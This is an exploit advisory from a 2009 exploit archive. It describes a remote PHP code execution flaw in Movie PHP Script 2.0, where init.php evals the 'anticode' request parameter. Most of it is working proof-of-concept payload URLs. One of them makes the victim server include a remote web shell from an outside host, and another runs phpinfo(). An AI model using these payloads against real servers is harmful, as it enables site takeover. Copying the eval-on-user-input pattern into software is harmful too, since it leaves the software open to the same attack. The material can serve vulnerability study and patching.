[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability
# Published : 2009-06-03
# Author : SirGod
# Previous Title : Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability
# Next Title : Joomla Component com_mosres Multiple SQL Injection Vulnerabilities
#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Remote PHP Code Execution
- Vulnerable code in system/services/init.php :
---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------
- PoC :
http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]
- Example :
http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";
- Example 2 :
http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();
#################################################################################################################
# www.Syue.com [2009-06-03]